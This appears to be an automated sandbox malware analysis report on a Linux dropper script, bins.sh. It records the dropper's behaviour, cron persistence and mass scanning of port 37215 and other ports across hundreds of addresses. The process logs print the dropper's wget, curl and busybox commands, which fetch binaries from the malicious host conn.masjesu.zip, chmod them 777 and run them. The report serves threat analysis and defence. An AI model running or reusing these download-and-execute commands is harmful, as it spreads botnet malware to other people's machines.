Malware Analysis Report

2025-05-28 16:16

Sample ID 241205-jqdr3s1mgp
Target bins.sh
SHA256 c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
Tags
discovery antivm defense_evasion execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

Threat Level: Shows suspicious behavior

The file bins.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion execution persistence privilege_escalatio

Executes dropped EXE

Renames itself

File and Directory Permissions Modification

Creates/modifies Cron job

Enumerates running processes

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-05 07:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-05 07:52

Reported

2024-12-05 07:54

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-05 07:52

Reported

2024-12-05 07:54

Platform

debian9-armhf-20240611-en

Max time kernel

150s

Max time network

153s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.nFADI4 /usr/bin/crontab N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/265/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/692/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/699/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/716/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/789/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/824/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/12/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/27/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/783/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/835/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/902/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/17/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/645/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/702/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/780/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/25/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/650/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/844/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/862/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/863/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/891/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/710/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/792/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/867/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/290/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/451/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/802/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/871/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/882/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/1/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/812/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/872/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/724/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/786/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/738/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/781/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/813/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/877/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/886/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/887/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/893/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/731/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/906/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/720/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/745/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/330/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/840/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/744/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/787/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/810/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/859/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/402/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/717/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/14/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/726/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/260/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/774/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/861/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/794/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/836/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/23/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/740/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/chmod

[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

[./zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/sh

[sh -c crontab -l]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c crontab -]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

/bin/chmod

[chmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

/tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG

[./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

/bin/rm

[rm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]

/bin/chmod

[chmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]

/tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9

[./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]

/bin/rm

[rm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]

/bin/chmod

[chmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]

/tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX

[./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]

/bin/rm

[rm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]

/bin/chmod

[chmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]

/tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS

[./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]

/bin/rm

[rm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:443 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:443 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 69.142.119.224:37215 tcp
US 18.3.191.68:37215 tcp
SG 43.78.129.16:37215 tcp
US 162.102.138.228:37215 tcp
US 165.236.214.216:37215 tcp
US 17.247.199.124:37215 tcp
US 54.25.27.65:37215 tcp
US 76.52.64.217:37215 tcp
US 208.189.30.14:37215 tcp
TW 120.104.147.95:37215 tcp
US 17.10.187.166:37215 tcp
AU 103.192.175.157:37215 tcp
GB 109.180.133.68:37215 tcp
US 68.91.202.150:37215 tcp
HK 156.225.167.158:37215 tcp
RU 213.151.28.166:37215 tcp
TW 180.218.146.162:37215 tcp
US 157.96.246.215:37215 tcp
US 184.117.24.190:37215 tcp
RU 178.155.12.58:37215 tcp
FR 85.222.202.82:37215 tcp
US 54.53.211.6:37215 tcp
DE 95.222.234.131:37215 tcp
US 68.165.156.81:37215 tcp
CN 1.82.128.50:37215 tcp
US 174.174.175.234:37215 tcp
AT 156.58.155.150:37215 tcp
NL 213.126.53.108:37215 tcp
CA 142.82.93.247:37215 tcp
CN 123.59.84.221:37215 tcp
CN 27.14.109.151:37215 tcp
US 168.229.122.63:37215 tcp
KR 211.168.77.245:37215 tcp
AU 203.1.240.63:37215 tcp
US 169.228.15.150:37215 tcp
KR 122.35.186.55:37215 tcp
US 8.80.179.141:37215 tcp
JP 126.76.48.179:37215 tcp
CL 191.117.233.63:37215 tcp
FR 62.68.65.208:37215 tcp
US 50.115.118.1:37215 tcp
US 64.65.229.66:37215 tcp
CN 221.11.176.194:37215 tcp
US 72.67.189.181:37215 tcp
US 167.16.222.76:37215 tcp
US 75.137.123.129:37215 tcp
DE 95.222.234.131:80 tcp
US 40.123.110.153:37215 tcp
US 157.223.143.141:37215 tcp
DE 2.202.212.94:37215 tcp
US 3.152.75.174:37215 tcp
US 70.183.110.242:37215 tcp
US 70.89.206.61:37215 tcp
US 57.125.252.42:37215 tcp
DE 79.193.48.79:37215 tcp
CN 121.32.165.48:37215 tcp
BR 177.18.194.254:37215 tcp
US 69.1.2.158:37215 tcp
US 32.102.69.60:37215 tcp
US 35.63.29.147:37215 tcp
US 206.203.220.17:37215 tcp
IT 80.19.154.252:37215 tcp
ID 36.79.170.74:37215 tcp
CN 14.148.116.187:37215 tcp
US 3.82.152.41:37215 tcp
DE 95.222.234.131:81 tcp
US 44.112.254.128:37215 tcp
CN 221.202.254.42:37215 tcp
US 66.102.216.222:37215 tcp
DE 2.202.212.94:80 tcp
RU 176.107.250.169:37215 tcp
US 96.149.194.215:37215 tcp
US 69.79.129.120:37215 tcp
CN 222.26.210.56:37215 tcp
US 12.153.80.135:37215 tcp
ID 39.230.241.27:37215 tcp
KW 212.43.17.7:37215 tcp
CN 42.102.62.228:37215 tcp
FI 212.226.245.49:37215 tcp
EG 45.105.207.10:37215 tcp
BR 200.205.230.214:37215 tcp
CN 123.197.194.234:37215 tcp
US 169.130.91.95:37215 tcp
DE 95.222.234.131:8080 tcp
DE 2.202.212.94:81 tcp
FI 212.226.245.49:80 tcp
DE 95.222.234.131:52869 tcp
DE 2.202.212.94:8080 tcp
FI 212.226.245.49:81 tcp
DE 95.222.234.131:7574 tcp
JP 126.76.48.179:80 tcp
DE 2.202.212.94:52869 tcp
DE 95.222.234.131:5555 tcp
FI 212.226.245.49:8080 tcp
DE 2.202.212.94:7574 tcp
FI 212.226.245.49:52869 tcp
SG 43.78.129.16:80 tcp
US 165.236.214.216:80 tcp
US 69.142.119.224:80 tcp
US 76.52.64.217:80 tcp
US 17.10.187.166:80 tcp
TW 120.104.147.95:80 tcp
US 17.247.199.124:80 tcp
US 54.25.27.65:80 tcp
US 208.189.30.14:80 tcp
US 162.102.138.228:80 tcp
AU 103.192.175.157:80 tcp
US 18.3.191.68:80 tcp
US 184.117.24.190:80 tcp
FR 85.222.202.82:80 tcp
TW 180.218.146.162:80 tcp
US 54.53.211.6:80 tcp
US 174.174.175.234:80 tcp
NL 213.126.53.108:80 tcp
CA 142.82.93.247:80 tcp
CN 1.82.128.50:80 tcp
HK 156.225.167.158:80 tcp
US 157.96.246.215:80 tcp
AT 156.58.155.150:80 tcp
FI 212.226.245.49:7574 tcp
US 68.91.202.150:80 tcp
US 68.165.156.81:80 tcp
RU 213.151.28.166:80 tcp
RU 178.155.12.58:80 tcp
GB 109.180.133.68:80 tcp
KR 122.35.186.55:80 tcp
US 72.67.189.181:80 tcp
CN 123.59.84.221:80 tcp
US 169.228.15.150:80 tcp
US 168.229.122.63:80 tcp
US 167.16.222.76:80 tcp
US 50.115.118.1:80 tcp
US 64.65.229.66:80 tcp
CN 221.11.176.194:80 tcp
US 8.80.179.141:80 tcp
US 75.137.123.129:80 tcp
AU 203.1.240.63:80 tcp
CN 27.14.109.151:80 tcp
KR 211.168.77.245:80 tcp
CL 191.117.233.63:80 tcp
FR 62.68.65.208:80 tcp
FI 212.226.245.49:5555 tcp
US 57.125.252.42:80 tcp
DE 79.193.48.79:80 tcp
US 70.89.206.61:80 tcp
US 40.123.110.153:80 tcp
US 70.183.110.242:80 tcp
US 3.152.75.174:80 tcp
US 157.223.143.141:80 tcp
BR 177.18.194.254:80 tcp
CN 121.32.165.48:80 tcp
ID 36.79.170.74:80 tcp
US 69.1.2.158:80 tcp
US 35.63.29.147:80 tcp
US 69.79.129.120:80 tcp
US 44.112.254.128:80 tcp
RU 176.107.250.169:80 tcp
US 206.203.220.17:80 tcp
US 3.82.152.41:80 tcp
CN 14.148.116.187:80 tcp
US 96.149.194.215:80 tcp
IT 80.19.154.252:80 tcp
US 32.102.69.60:80 tcp
US 66.102.216.222:80 tcp
CN 221.202.254.42:80 tcp
US 12.153.80.135:80 tcp
US 169.130.91.95:80 tcp
ID 39.230.241.27:80 tcp
CN 42.102.62.228:80 tcp
EG 45.105.207.10:80 tcp
BR 200.205.230.214:80 tcp
KW 212.43.17.7:80 tcp
CN 222.26.210.56:80 tcp
CN 123.197.194.234:80 tcp
FI 212.226.245.49:49152 tcp
US 3.82.152.41:81 tcp
FI 212.226.245.49:8443 tcp
JP 126.76.48.179:81 tcp
NL 145.210.134.181:37215 tcp
DE 95.222.234.131:49152 tcp
DE 2.202.212.94:5555 tcp
US 162.102.138.228:81 tcp
US 68.91.202.150:81 tcp
HK 156.225.167.158:81 tcp
SG 43.78.129.16:81 tcp
US 76.52.64.217:81 tcp
TW 120.104.147.95:81 tcp
US 208.189.30.14:81 tcp
FR 85.222.202.82:81 tcp
US 17.10.187.166:81 tcp
US 165.236.214.216:81 tcp
AT 156.58.155.150:81 tcp
GB 109.180.133.68:81 tcp
US 17.247.199.124:81 tcp
US 157.96.246.215:81 tcp
RU 213.151.28.166:81 tcp
US 68.165.156.81:81 tcp
US 69.142.119.224:81 tcp
NL 213.126.53.108:81 tcp
US 174.174.175.234:81 tcp
AU 103.192.175.157:81 tcp
US 18.3.191.68:81 tcp
US 184.117.24.190:81 tcp
CN 1.82.128.50:81 tcp
TW 180.218.146.162:81 tcp
US 54.25.27.65:81 tcp
RU 178.155.12.58:81 tcp
US 54.53.211.6:81 tcp
CA 142.82.93.247:81 tcp
US 72.67.189.181:81 tcp
US 168.229.122.63:81 tcp
US 167.16.222.76:81 tcp
US 50.115.118.1:81 tcp
US 8.80.179.141:81 tcp
AU 203.1.240.63:81 tcp
CN 27.14.109.151:81 tcp
KR 122.35.186.55:81 tcp
US 75.137.123.129:81 tcp
US 169.228.15.150:81 tcp
CN 123.59.84.221:81 tcp
KR 211.168.77.245:81 tcp
CN 221.11.176.194:81 tcp
US 64.65.229.66:81 tcp
US 157.223.143.141:81 tcp
CL 191.117.233.63:81 tcp
DE 79.193.48.79:81 tcp
US 3.152.75.174:81 tcp
US 70.89.206.61:81 tcp
BR 177.18.194.254:81 tcp
US 40.123.110.153:81 tcp
FR 62.68.65.208:81 tcp
US 70.183.110.242:81 tcp
US 57.125.252.42:81 tcp
CN 121.32.165.48:81 tcp
RU 176.107.250.169:81 tcp
CN 221.202.254.42:81 tcp
IT 80.19.154.252:81 tcp
US 32.102.69.60:81 tcp
US 44.112.254.128:81 tcp
US 35.63.29.147:81 tcp
US 206.203.220.17:81 tcp
US 96.149.194.215:81 tcp
US 66.102.216.222:81 tcp
US 69.79.129.120:81 tcp
US 69.1.2.158:81 tcp
ID 36.79.170.74:81 tcp
CN 14.148.116.187:81 tcp
CN 42.102.62.228:81 tcp
US 169.130.91.95:81 tcp
BR 200.205.230.214:81 tcp
EG 45.105.207.10:81 tcp
ID 39.230.241.27:81 tcp
US 12.153.80.135:81 tcp
CN 222.26.210.56:81 tcp
KW 212.43.17.7:81 tcp
CN 123.197.194.234:81 tcp
US 3.82.152.41:8080 tcp
NL 145.210.134.181:80 tcp
JP 126.76.48.179:8080 tcp
DE 95.222.234.131:8443 tcp
DE 2.202.212.94:49152 tcp
DK 2.105.79.16:37215 tcp
DE 2.202.212.94:8443 tcp
US 75.137.123.129:8080 tcp
US 54.53.211.6:8080 tcp
US 184.117.24.190:8080 tcp
US 18.3.191.68:8080 tcp
US 72.67.189.181:8080 tcp
US 162.102.138.228:8080 tcp
CA 142.82.93.247:8080 tcp
US 157.96.246.215:8080 tcp
US 54.25.27.65:8080 tcp
US 69.142.119.224:8080 tcp
US 165.236.214.216:8080 tcp
HK 156.225.167.158:8080 tcp
AT 156.58.155.150:8080 tcp
TW 120.104.147.95:8080 tcp
FR 85.222.202.82:8080 tcp
KR 211.168.77.245:8080 tcp
KR 122.35.186.55:8080 tcp
RU 213.151.28.166:8080 tcp
SG 43.78.129.16:8080 tcp
CN 123.59.84.221:8080 tcp
US 208.189.30.14:8080 tcp
US 68.91.202.150:8080 tcp
US 174.174.175.234:8080 tcp
AU 203.1.240.63:8080 tcp
US 169.228.15.150:8080 tcp
CN 1.82.128.50:8080 tcp
CN 221.11.176.194:8080 tcp
US 167.16.222.76:8080 tcp
US 17.10.187.166:8080 tcp
US 76.52.64.217:8080 tcp
US 50.115.118.1:8080 tcp
US 17.247.199.124:8080 tcp
TW 180.218.146.162:8080 tcp
US 8.80.179.141:8080 tcp
CN 27.14.109.151:8080 tcp
NL 213.126.53.108:8080 tcp
GB 109.180.133.68:8080 tcp
AU 103.192.175.157:8080 tcp
RU 178.155.12.58:8080 tcp
US 68.165.156.81:8080 tcp
US 168.229.122.63:8080 tcp
US 64.65.229.66:8080 tcp
US 70.183.110.242:8080 tcp
BR 177.18.194.254:8080 tcp
RU 176.107.250.169:8080 tcp
US 3.152.75.174:8080 tcp
CN 121.32.165.48:8080 tcp
US 157.223.143.141:8080 tcp
DE 79.193.48.79:8080 tcp
FR 62.68.65.208:8080 tcp
US 70.89.206.61:8080 tcp
US 40.123.110.153:8080 tcp
IT 80.19.154.252:8080 tcp
CN 221.202.254.42:8080 tcp
CL 191.117.233.63:8080 tcp
US 57.125.252.42:8080 tcp
US 206.203.220.17:8080 tcp
US 44.112.254.128:8080 tcp
US 69.79.129.120:8080 tcp
US 32.102.69.60:8080 tcp
US 96.149.194.215:8080 tcp
CN 14.148.116.187:8080 tcp
US 66.102.216.222:8080 tcp
CN 42.102.62.228:8080 tcp
ID 36.79.170.74:8080 tcp
US 69.1.2.158:8080 tcp
US 35.63.29.147:8080 tcp
US 12.153.80.135:8080 tcp
BR 200.205.230.214:8080 tcp
EG 45.105.207.10:8080 tcp
KW 212.43.17.7:8080 tcp
CN 222.26.210.56:8080 tcp
ID 39.230.241.27:8080 tcp
US 169.130.91.95:8080 tcp
CN 123.197.194.234:8080 tcp
US 3.82.152.41:52869 tcp
RU 213.151.28.166:52869 tcp
JP 126.76.48.179:52869 tcp
NL 145.210.134.181:81 tcp
DK 2.105.79.16:80 tcp
US 18.7.155.165:37215 tcp
US 8.80.179.141:52869 tcp
US 17.10.187.166:52869 tcp
US 40.123.110.153:52869 tcp
DE 79.193.48.79:52869 tcp
BR 177.18.194.254:52869 tcp
US 64.65.229.66:52869 tcp
CN 121.32.165.48:52869 tcp
US 68.165.156.81:52869 tcp
US 70.183.110.242:52869 tcp
FR 62.68.65.208:52869 tcp
NL 213.126.53.108:52869 tcp
US 70.89.206.61:52869 tcp
US 57.125.252.42:52869 tcp
US 3.152.75.174:52869 tcp
IT 80.19.154.252:52869 tcp
US 168.229.122.63:52869 tcp
AU 103.192.175.157:52869 tcp
GB 109.180.133.68:52869 tcp
CN 221.202.254.42:52869 tcp
CL 191.117.233.63:52869 tcp
SG 43.78.129.16:52869 tcp
US 165.236.214.216:52869 tcp
CN 1.82.128.50:52869 tcp
KR 211.168.77.245:52869 tcp
US 50.115.118.1:52869 tcp
US 72.67.189.181:52869 tcp
CN 14.148.116.187:52869 tcp
US 206.203.220.17:52869 tcp
US 44.112.254.128:52869 tcp
US 35.63.29.147:52869 tcp
CN 42.102.62.228:52869 tcp
US 96.149.194.215:52869 tcp
ID 36.79.170.74:52869 tcp
FR 85.222.202.82:52869 tcp
CA 142.82.93.247:52869 tcp
US 69.79.129.120:52869 tcp
CN 27.14.109.151:52869 tcp
US 174.174.175.234:52869 tcp
US 54.53.211.6:52869 tcp
US 69.1.2.158:52869 tcp
TW 120.104.147.95:52869 tcp
US 18.3.191.68:52869 tcp
RU 178.155.12.58:52869 tcp
US 69.142.119.224:52869 tcp
HK 156.225.167.158:52869 tcp
US 54.25.27.65:52869 tcp
CN 221.11.176.194:52869 tcp
AU 203.1.240.63:52869 tcp
KR 122.35.186.55:52869 tcp
US 157.96.246.215:52869 tcp
AT 156.58.155.150:52869 tcp
US 157.223.143.141:52869 tcp
US 169.228.15.150:52869 tcp
RU 176.107.250.169:52869 tcp
US 167.16.222.76:52869 tcp
TW 180.218.146.162:52869 tcp
US 208.189.30.14:52869 tcp
US 162.102.138.228:52869 tcp
US 75.137.123.129:52869 tcp
US 66.102.216.222:52869 tcp
US 17.247.199.124:52869 tcp
US 76.52.64.217:52869 tcp
BR 200.205.230.214:52869 tcp
EG 45.105.207.10:52869 tcp
US 12.153.80.135:52869 tcp
KW 212.43.17.7:52869 tcp
CN 123.197.194.234:52869 tcp
US 169.130.91.95:52869 tcp
CN 222.26.210.56:52869 tcp
ID 39.230.241.27:52869 tcp
US 32.102.69.60:52869 tcp
CN 123.59.84.221:52869 tcp
US 68.91.202.150:52869 tcp
US 184.117.24.190:52869 tcp
US 3.82.152.41:7574 tcp
RU 213.151.28.166:7574 tcp
NL 145.210.134.181:8080 tcp
JP 126.76.48.179:7574 tcp
DK 2.105.79.16:81 tcp
US 18.7.155.165:80 tcp
BR 177.18.194.254:7574 tcp
US 68.165.156.81:7574 tcp
DE 79.193.48.79:7574 tcp
US 64.65.229.66:7574 tcp
US 17.10.187.166:7574 tcp
NL 213.126.53.108:7574 tcp
